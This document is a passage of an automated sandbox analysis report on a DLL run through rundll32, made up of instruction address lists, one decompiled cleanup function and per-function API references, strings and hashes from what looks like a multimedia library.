0x10039bc8
0x10039bcb
0x10039bcf
0x10039bd3
0x10039bd6
0x10039bd9
0x10039bdd
0x10039be0
0x10039be3
0x10039be7
0x10039bee
0x10039bf2
0x10039bf7
0x10039bfb
0x10039c00
0x10039c03
0x10039c08
0x10039c11
0x10039c30
0x10039c30
0x10039c32
0x10039c38
0x10039c3b
0x10039c41
0x10039c44
0x10039c18
0x10039c46
0x10039c46
0x10039c4a
0x10039c4d
0x10039c51
0x10039c54
0x10039c54
0x10039c1d
0x10039c20
0x10039c25
0x10039c2b
0x00000000
0x10039c13
0x10039c60
0x10039c63
0x10039c68
0x10039c6c
0x10039c70
0x10039c74
0x10039c7c
0x10039c7e
0x10039c81
0x10039c86
0x10039c88
0x10039c8b
0x10039c91
0x10039c93
0x10039c96
0x10039c9c
0x10039c9e
0x10039ca1
0x10039ca7
0x10039ca9
0x10039cac
0x10039cb2
0x10039cb4
0x10039cb7
0x10039cbd
0x10039cbf
0x10039cc2
0x10039cc8
0x10039cca
0x10039ccd
0x10039cd3
0x10039cd5
0x10039cd8
0x10039cde
0x10039ce0
0x10039ce3
0x10039ce3
0x10039cde
0x10039cd3
0x10039cc8
0x10039cbd
0x10039cb2
0x10039ca7
0x10039c9c
0x10039c91
0x10039c86
0x10039ce6
0x10039ce9
0x10039cea
0x10039ceb
0x10039cec
0x00000000
0x00000000
0x1001cb80
0x1001cb86
0x1003e8f0
0x1003e8f1
0x1003e8f2
0x1003e8f7
0x1003e8f8
0x1003e8f9
0x1003e8fc
0x1003e900
0x1003e904
0x1003e907
0x1003e90a
0x1003e90e
0x1003e911
0x1003e914
0x1003e918
0x1003e91b
0x1003e91d
0x1003e91f
0x1003e921
0x1003e926
0x1003e928
0x1003e92a
0x1003e92e
0x1003e932
0x1003e936
0x1003e93b
0x1003e93e
0x1003e943
0x1003e94c
0x1003e968
0x1003e968
0x1003e96a
0x1003e970
0x1003e973
0x1003e979
0x1003e97c
0x1003e950
0x1003e97e
0x1003e97e
0x1003e982
0x1003e985
0x1003e989
0x1003e98c
0x1003e98c
0x1003e955
0x1003e958
0x1003e95d
0x1003e963
0x00000000
0x1003e94e
0x1003e998
0x1003e99b
0x1003e9a0
0x1003e9a4
0x1003e9a8
0x1003e9ac
0x1003e9b4
0x1003e9b6
0x1003e9b9
0x1003e9bb
0x1003e9c0
0x1003e9c2
0x1003e9c5
0x1003e9c7
0x1003e9cd
0x1003e9cf
0x1003e9d2
0x1003e9d4
0x1003e9da
0x1003e9dc
0x1003e9df
0x1003e9e1
0x1003e9e7
0x1003e9e9
0x1003e9ec
0x1003e9ee
0x1003e9f4
0x1003e9f6
0x1003e9f9
0x1003e9fb
0x1003ea01
0x1003ea03
0x1003ea06
0x1003ea08
0x1003ea0e
0x1003ea10
0x1003ea13
0x1003ea15
0x1003ea1b
0x1003ea1d
0x1003ea20
0x1003ea22
0x1003ea22
0x1003ea1b
0x1003ea0e
0x1003ea01
0x1003e9f4
0x1003e9e7
0x1003e9da
0x1003e9cd
0x1003e9c0
0x1003ea25
0x1003ea28
0x1003ea29
0x1003ea2a
0x1003ea2b
0x1003ea2c
0x00000000
0x00000000
0x1001cb60
0x1001cb66
0x100499a0
0x100499a1
0x100499a3
0x100499a4
0x100499a6
0x100499a7
0x100499a8
0x100499ab
0x100499af
0x100499b3
0x100499b7
0x100499ba
0x100499bf
0x100499c2
0x100499c4
0x100499c8
0x100499ca
0x100499cc
0x100499d0
0x100499d2
0x100499d8
0x100499db
0x100499de
0x100499e0
0x100499e2
0x100499e8
0x100499ec
0x10049d10
0x10049d17
0x10049d1a
0x10049d25
0x10049d2a
0x10049d2f
0x100499f2
0x100499f2
0x100499f5
0x100499fa
0x100499fa
0x100499ff
0x10049a03
0x10049a05
0x10049a07
0x10049a09
0x10049a09
0x10049a0d
0x10049a10
0x10049a11
0x10049a15
0x10049a15
0x10049a17
0x10049a1a
0x10049a1f
0x10049a28
0x10049a2a
0x10049a48
0x10049a48
0x10049a48
0x10049a4a
0x10049a4d
0x10049a50
0x10049a53
0x10049a59
0x10049a5c
0x00000000
0x00000000
0x10049a30
0x10049a35
0x10049a38
0x10049a3d
0x10049a46
0x00000000
0x00000000
0x00000000
0x10049a46
0x10049a5e
0x10049a65
0x10049a6b
0x10049a72
0x10049a77
0x10049a7a
0x10049a7d
0x00000000
0x00000000
0x10049a7d
0x10049a7f
0x10049a7f
0x10049a81
0x10049a87
0x10049a8a
0x10049a8f
0x10049a92
0x10049a95
0x10049a98
0x10049a9d
0x10049cd0
0x10049cd5
0x10049cd9
0x10049cdb
0x10049d76
0x10049e95
0x10049e9a
0x10049e9e
0x10049e9f
0x10049ea2
0x10049ea2
0x10049d80
0x10049e6b
0x10049e6e
0x10049e71
0x10049e74
0x10049e77
0x10049e77
0x10049d89
0x10049d8f
0x10049d93
0x10049d95
0x10049d99
0x10049d9c
0x10049d9f
0x10049da1
0x10049da4
0x10049da4
0x10049da7
0x10049daa
0x10049dad
0x10049db1
0x10049db5
0x10049db7
0x10049db9
0x10049db9
0x10049d89
0x10049ce1
0x10049ce9
0x10049d3f
0x10049d42
0x10049d45
0x10049d48
0x10049d4d
0x00000000
0x10049d4f
0x10049ceb
0x10049cee
0x10049d36
0x10049d36
0x10049d3a
0x10049d3a
0x10049cee
0x10049cf0
0x10049cf3
0x10049cfc
0x10049d01
0x10049d04
0x10049d09
0x10049aa3
0x10049aa3
0x10049aa7
0x10049aa7
0x10049aac
0x10049ab2
0x10049c03
0x10049e25
0x10049e28
0x10049e29
0x10049e2a
0x10049e2b
0x10049e2b
0x10049c10
0x10049e33
0x10049e36
0x10049e39
0x10049e3c
0x10049e3f
0x10049e3f
0x10049c19
0x10049c1f
0x10049c21
0x10049c23
0x10049c26
0x10049c26
0x10049c29
0x10049c2c
0x10049c2f
0x10049c33
0x10049c35
0x10049c35
0x10049c19
0x10049ab8
0x10049ac0
0x10049be8
0x10049beb
0x10049bee
0x10049bf1
0x10049bf6
0x00000000
0x10049bfc
0x00000000
0x10049bfc
0x10049b9e
0x10049b9e
0x10049ba1
0x10049ba2
0x10049ba3
0x10049ba4
0x10049ba5
0x00000000
0x10049ac6
0x10049ac9
0x10049bd8
0x10049bd8
0x10049bdc
0x10049bdc
0x10049ac9
0x10049acf
0x10049acf
0x10049ad2
0x10049ad7
0x10049ada
0x10049adc
0x10049ae2
0x10049ae5
0x10049ae8
0x10049af0
0x10049c83
0x10049c85
0x10049c89
0x10049c8d
0x10049dc5
0x10049e56
0x10049e5b
0x10049e5f
0x10049e60
0x10049e63
0x10049e63
0x10049dce
0x10049e80
0x10049e83
0x10049e86
0x10049e89
0x10049e8c
0x10049e8c
0x10049dd7
0x10049ddd
0x10049de1
0x10049de3
0x10049de7
0x10049dea
0x10049ded
0x10049def
0x10049df2
0x10049df2
0x10049df5
0x10049df8
0x10049dfb
0x10049dff
0x10049e03
0x10049e05
0x10049e07
0x10049e07
0x10049dd7
0x10049c93
0x10049c9b
0x10049d5d
0x10049d60
0x10049d63
0x10049d66
0x10049d6b
0x00000000
0x10049d71
0x10049ca1
0x10049ca4
0x10049d51
0x10049d51
0x10049d55
0x10049d55
0x10049ca4
0x10049caa
0x10049cb3
0x10049cb8
0x10049cbc
0x10049cbf
0x10049cc2
0x10049af6
0x10049af6
0x10049af9
0x10049afe
0x10049afe
0x10049b02
0x10049b07
0x10049c46
0x10049e48
0x10049e4b
0x10049e4c
0x10049e4d
0x10049e4e
0x10049e4e
0x10049c52
0x10049e10
0x10049e13
0x10049e16
0x10049e19
0x10049e1c
0x10049e1c
0x10049c5b
0x10049c61
0x10049c63
0x10049c65
0x10049c68
0x10049c68
0x10049c6b
0x10049c6e
0x10049c71
0x10049c75
0x10049c77
0x10049c77
0x10049c5b
0x10049b0d
0x10049b11
0x10049bc0
0x10049bc5
0x10049bca
0x10049bcd
0x00000000
0x10049bd3
0x00000000
0x10049bd3
0x00000000
0x10049b17
0x10049b19
0x10049bb0
0x10049bb0
0x10049bb4
0x10049bb4
0x10049b19
0x10049b1f
0x10049b1f
0x10049b21
0x10049b26
0x10049b28
0x10049b2a
0x10049b2e
0x10049b30
0x10049b30
0x10049b37
0x10049b3e
0x10049b40
0x10049b44
0x10049b46
0x10049b4a
0x10049b4d
0x10049b50
0x10049b53
0x10049b55
0x10049b5a
0x10049b5c
0x10049b5c
0x10049b60
0x10049b64
0x10049b68
0x10049b6f
0x10049b71
0x10049b74
0x10049b78
0x10049b7c
0x10049b7e
0x10049b81
0x10049b84
0x10049b86
0x10049b88
0x10049b8b
0x10049b8e
0x10049b94
0x10049b9b
0x10049b9b
0x10049b6f
0x00000000
0x00000000
0x1001cb90
0x1001cb93
0x1001cb95
0x1001cb97
0x1001cb99
0x00000000
0x00000000
0x1001cb50
0x1001cb53
0x1001cb55
0x1001cb57
0x00000000
0x00000000
0x1001ccf0
0x1001ccf4
0x1001ccf8
0x1001ccfa
0x1001ccfd
0x00000000
0x00000000
0x1001cd10
0x1001cd14
0x1001cd18
0x1001cd1a
0x1001cd1d
0x00000000
0x00000000
0x1001cc40
0x1001cc44
0x1001cc48
0x1001cc4a
0x1001cc4d
0x1001cc54
0x1001cc56
0x1001cc59
0x1001cc60
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001cca0
0x1001cca4
0x1001cca8
0x1001ccaa
0x1001ccad
0x00000000
0x00000000
0x1001cbf8
0x1001cbfc
0x1001cc00
0x1001cc02
0x1001cc05
0x00000000
0x00000000
0x1001ccc0
0x1001ccc3
0x1001ccc7
0x1001ccc9
0x1001cccb
0x00000000
0x00000000
0x1001ccd8
0x1001ccdb
0x1001ccdd
0x1001cce1
0x1001cc10
0x1001cc12
0x1001cc14
0x1001cc18
0x1001cc1e
0x1001cc70
0x1001cc76
0x1001cdb8
0x1001cdbd
0x1001cdc1
0x1001cdc2
0x1001cdc4
0x1001cdc8
0x1001cdc8
0x1001cc82
0x1001cda0
0x1001cda3
0x1001cda6
0x1001cda9
0x1001cdac
0x1001cdac
0x1001cc8e
0x1001cc90
0x1001cc92
0x1001cc95
0x1001cc98
0x1001cc9b
0x1001cc9b
0x1001cc8e
0x1001cc20
0x1001cc20
0x1001cc20
0x1001cc20
0x1001cc24
0x1001cd30
0x1001cd34
0x1001cd39
0x1001cd3c
0x1001cd76
0x1001cdf0
0x1001cdf3
0x1001cdf4
0x1001cdf4
0x1001cd7e
0x1001cde0
0x1001cde5
0x1001cde8
0x1001cde8
0x1001cd86
0x1001cdd0
0x1001cdd6
0x1001cdd9
0x1001cdd9
0x1001cd88
0x1001cd8a
0x1001cd8c
0x1001cd8f
0x1001cd92
0x1001cd92
0x1001cd92
0x1001cd92
0x1001cd41
0x1001cd43
0x1001cd49
0x1001cd49
0x1001cd4f
0x1001cd51
0x1001cd56
0x1001cd56
0x1001cd5c
0x1001cd62
0x1001cd62
0x1001cd5c
0x1001cc2a
0x1001cc2e
0x1001cc32
0x1001cc36
0x1001cc3a
0x1001cc3d
0x00000000
0x00000000
0x1001cfa0
0x1001cfa4
0x1001cfa8
0x1001cfaa
0x1001cfad
0x00000000
0x00000000
0x1001cfc0
0x1001cfc4
0x1001cfc8
0x1001cfca
0x1001cfcd
0x00000000
0x00000000
0x1001cf60
0x1001cf64
0x1001cf68
0x1001cf6a
0x1001cf6d
0x00000000
0x00000000
0x1001cf80
0x1001cf84
0x1001cf88
0x1001cf8a
0x1001cf8d
0x00000000
0x00000000
0x1001ced8
0x1001cedc
0x1001cee0
0x1001cee2
0x1001cee5
0x00000000
0x00000000
0x1001cfe0
0x1001cfe3
0x1001cfe7
0x1001cfe9
0x1001cfeb
0x00000000
0x00000000
0x1001cff8
0x1001cffb
0x1001cffd
0x1001d001
0x1001cef0
0x1001cef0
0x1001cef4
0x1001cef8
0x1001cefd
0x1001cf01
0x1001cf05
0x1001cf08
0x1001cf0d
0x1001cf10
0x1001cf15
0x1001cf15
0x1001cf15
0x1001cf17
0x1001cf1b
0x1001cf24
0x1001cf26
0x1001cf2c
0x1001d016
0x1001d058
0x1001d05d
0x1001d060
0x1001d061
0x1001d065
0x1001d065
0x1001d01e
0x1001d040
0x1001d043
0x1001d046
0x1001d049
0x1001d04c
0x1001d04c
0x1001d026
0x1001d02c
0x1001d02e
0x1001d031
0x1001d034
0x1001d037
0x1001d037
0x1001d026
0x1001cf32
0x1001cf32
0x1001cf32
0x1001cf36
0x1001cf38
0x1001cf38
0x1001cf3d
0x1001cf44
0x1001cf4b
0x1001cf52
0x1001cf59
0x1001cf5f
0x00000000
0x00000000
0x1001c880
0x00000000

APIs

mv_ripemd_init.MAIN ref: 1001C8DE
mv_ripemd_init.MAIN ref: 1001C8F6
mv_ripemd_init.MAIN ref: 1001C90E
mv_ripemd_init.MAIN ref: 1001C926
mv_sha_init.MAIN ref: 1001C93E
mv_sha_init.MAIN ref: 1001C95E
mv_sha_init.MAIN ref: 1001C97E
mv_sha512_init.MAIN ref: 1001C99E
mv_sha512_init.MAIN ref: 1001C9BE
mv_sha512_init.MAIN ref: 1001C9DE
mv_sha512_init.MAIN ref: 1001C9FE
mv_adler32_update.MAIN ref: 1001CA46
mv_crc.MAIN ref: 1001CAD5

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_ripemd_initmv_sha512_init$mv_sha_init$mv_adler32_updatemv_crc
String ID:
API String ID: 2533704273-0
Opcode ID: a5574497256713bb20ba09e0eacec7ebb4491d86d0e4b8baf7000fed20719829
Instruction ID: b4fd7817c68cc5ebcb381f62e52a11943eedc005ab1a14790db74db78419b9e7
Opcode Fuzzy Hash: a5574497256713bb20ba09e0eacec7ebb4491d86d0e4b8baf7000fed20719829
Instruction Fuzzy Hash: 8871AFB4909701DFC754DF68C08091ABBE0FF8D354F5489AEE9898B322E735D980EB56

Uniqueness

Uniqueness Score: -1.00%

Function 1001A460 Relevance: 19.6, APIs: 13, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1001A460(signed char __eax) {
				void* __ebx;
				void* __esi;
				void* _t68;
				intOrPtr _t74;
				signed char _t79;
				signed char _t82;
				char* _t83;
				intOrPtr _t85;
				signed int _t86;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				signed int _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr* _t100;

				_t79 = __eax;
				_t100 = _t99 - 0x1c;
				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
					_t89 = 0;
					do {
						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
						_t89 = _t89 + 1;
						_t95 =  *_t98;
						_t96 = _t95 + 0xc;
						 *_t100 = _t95 + 0x10;
						E1000A000(__eax, _t96);
						 *_t100 = _t96;
						L10011CC0();
						 *_t100 = _t98;
						E100265C0();
					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
				}
				_t90 = _t79 + 0xb8;
				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
				 *_t100 = _t79 + 0xe0;
				_t85 = _t79 + 0xd8;
				E100265C0();
				do {
					 *_t100 = _t90;
					_t90 = _t90 + 4;
					E1000A000(_t79, _t90);
				} while (_t85 != _t90);
				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
					_t94 = 0;
					do {
						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
						_t94 = _t94 + 1;
						 *_t100 = _t74;
						E1000A000(_t79, _t94);
					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
				}
				 *_t100 = _t85;
				E100265C0();
				 *_t100 = _t79 + 0x118;
				L10011CC0();
				 *_t100 = _t79 + 0x128;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x12c;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x140;
				E1000A000(_t79, _t90);
				if( *(_t79 + 0x40) != _t79) {
					 *_t100 = _t79 + 0x40;
					E100265C0();
				}
				_t86 = 0x178;
				 *_t100 = _t79 + 0x158;
				E1000D270();
				_t82 = _t79;
				if((_t79 & 0x00000001) != 0) {
					 *_t79 = 0;
					_t82 = _t79 + 1;
					_t86 = 0x177;
					if((_t82 & 0x00000002) == 0) {
						goto L12;
					} else {
						goto L20;
					}
					L14:
					_t83 = _t82 + _t68;
					if((_t86 & 0x00000004) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 4;
					}
					if((_t86 & 0x00000002) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 2;
					}
					if((_t86 & 0x00000001) != 0) {
						 *_t83 = 0;
					}
					 *((intOrPtr*)(_t79 + 0x100)) = 0;
					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
					 *((intOrPtr*)(_t79 + 0x70)) = 0;
					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x68)) = 0;
					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
					 *((intOrPtr*)(_t79 + 0x54)) = 1;
					 *((intOrPtr*)(_t79 + 0x60)) = 1;
					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
					 *(_t79 + 0x40) = _t79;
					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
					return 2;
				} else {
					if((_t82 & 0x00000002) != 0) {
						L20:
						 *_t82 = 0;
						_t86 = _t86 - 2;
						_t82 = _t82 + 2;
					}
				}
				L12:
				_t68 = 0;
				_t92 = _t86 & 0xfffffff8;
				do {
					 *((intOrPtr*)(_t82 + _t68)) = 0;
					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
					_t68 = _t68 + 8;
				} while (_t68 < _t92);
				goto L14;
			}

0x1001a464
0x1001a466
0x1001a471
0x1001a473
0x1001a480
0x1001a486
0x1001a489
0x1001a48a
0x1001a490
0x1001a493
0x1001a496
0x1001a49b
0x1001a49e
0x1001a4a3
0x1001a4a6
0x1001a4ab
0x1001a480
0x1001a4b3
0x1001a4bb
0x1001a4c7
0x1001a4ca
0x1001a4d0
0x1001a4e0
0x1001a4e0
0x1001a4e3
0x1001a4e6
0x1001a4eb
0x1001a4f7
0x1001a4f9
0x1001a500
0x1001a506
0x1001a509
0x1001a50a
0x1001a50d
0x1001a512
0x1001a500
0x1001a51a
0x1001a51d
0x1001a528
0x1001a52b
0x1001a536
0x1001a539
0x1001a544
0x1001a547
0x1001a552
0x1001a555
0x1001a55d
0x1001a562
0x1001a565
0x1001a565
0x1001a570
0x1001a575
0x1001a578
0x1001a582
0x1001a584
0x1001a668
0x1001a66b
0x1001a66e
0x1001a676
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a5a8
0x1001a5a8
0x1001a5b0
0x1001a6a5
0x1001a6ab
0x1001a6ab
0x1001a5bc
0x1001a698
0x1001a69d
0x1001a69d
0x1001a5c5
0x1001a690
0x1001a690
0x1001a5d2
0x1001a5e2
0x1001a5f2
0x1001a603
0x1001a60a
0x1001a611
0x1001a618
0x1001a61e
0x1001a624
0x1001a62a
0x1001a630
0x1001a637
0x1001a63e
0x1001a645
0x1001a64c
0x1001a64f
0x1001a655
0x1001a662
0x1001a58a
0x1001a58d
0x1001a680
0x1001a680
0x1001a685
0x1001a688
0x1001a688
0x1001a58d
0x1001a593
0x1001a595
0x1001a597
0x1001a59a
0x1001a59a
0x1001a59d
0x1001a5a1
0x1001a5a4
0x00000000

APIs

mv_dict_free.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A49E
mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4A6
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A496

Part of subcall function 1000A000: mv_freep.MAIN ref: 1000A01E

mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4D0
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A4E6
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A50D
mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A51D
mv_dict_free.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A52B
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A539
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A547
mv_buffer_unref.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A555
mv_freep.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A565
mv_channel_layout_uninit.MAIN(?,?,?,?,?,?,1001ADCA), ref: 1001A578

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
String ID:
API String ID: 1735483532-0
Opcode ID: 945f5bc7cbde55a6aa345190f856de26ec9369814dab5ad9417d2f0141cb4add
Instruction ID: 3743f490041121a309f73bd17641a77e7b536aba58928b40e76834ce72ff9424
Opcode Fuzzy Hash: 945f5bc7cbde55a6aa345190f856de26ec9369814dab5ad9417d2f0141cb4add
Instruction Fuzzy Hash: 3A516CB19047028BDB10DF24C88178A77E5FF45364F0A45BADC989F38AE775E8C58BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1000C650
memcmp.MSVCRT ref: 1000C6F4

Strings

mono, xrefs: 1000C6B0

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: memcmpstrlen
String ID: mono
API String ID: 3108337309-2381334079
Opcode ID: 05a9566f9cebdc7444aeb341508e8bd87ecfd7e1d953646c9f26566dae47a867
Instruction ID: b6009183c03875402946771f74e016b0be1646e1b5b10329ba9fdfd6138aa893
Opcode Fuzzy Hash: 05a9566f9cebdc7444aeb341508e8bd87ecfd7e1d953646c9f26566dae47a867
Instruction Fuzzy Hash: 4D712874A083598FE314DF25C484A1ABBE2FFC8384F15892EE88997315DB70E8459B86

Uniqueness

Uniqueness Score: -1.00%

Function 1001E450 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

mv_get_pix_fmt_name.MAIN ref: 1001E64E
mv_log.MAIN ref: 1001E675

Strings

The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_pix_fmt_namemv_log
String ID: The hardware pixel format '%s' is not supported by the device type '%s'
API String ID: 3418758923-379977042
Opcode ID: 5dfad572c67db8fa61b7bb2c6cdad9a604c24d0b64868fd794a6f7046a9e5d28
Instruction ID: 93c42ac0cc7c39aee4c6308fb1e9594b2517373d7f7eca67d321c97bd06f55ee
Opcode Fuzzy Hash: 5dfad572c67db8fa61b7bb2c6cdad9a604c24d0b64868fd794a6f7046a9e5d28
Instruction Fuzzy Hash: 4861C274608B818FC750DF29C480A0EB7E5FF88754F568A6DE998DB351E770EC818B42

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1D0 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

mv_realloc.MAIN ref: 1000A231
mv_mallocz.MAIN ref: 1000A24B
mv_mallocz.MAIN ref: 1000A284
mv_freep.MAIN ref: 1000A2DA
mv_realloc.MAIN ref: 1000A344
mv_realloc.MAIN ref: 1000A36B
mv_mallocz.MAIN ref: 1000A385
mv_mallocz.MAIN ref: 1000A3BC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_realloc$mv_freep
String ID:
API String ID: 3944475926-0
Opcode ID: 21c0e84fb2d2b07cdbd2145871ab2905cba1277f35f8114cc737119d02b58269
Instruction ID: 4ee62d273146a1fe968e339e986c88b207b98d61c88eaf1789f61ff4cee38887
Opcode Fuzzy Hash: 21c0e84fb2d2b07cdbd2145871ab2905cba1277f35f8114cc737119d02b58269
Instruction Fuzzy Hash: BF7115B48087508FD710DF24C48471ABBE0FF8A384F568A6DE9898B369D775E980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10029240 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 225stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 100292C3
mv_log.MAIN ref: 100292ED

Strings

%c%c%c%c%c%c%c%c%c%c%c, xrefs: 1002957E
%s%-17s , xrefs: 10029400
%-15s , xrefs: 100292D4
%-12s , xrefs: 10029440

Memory Dump Source

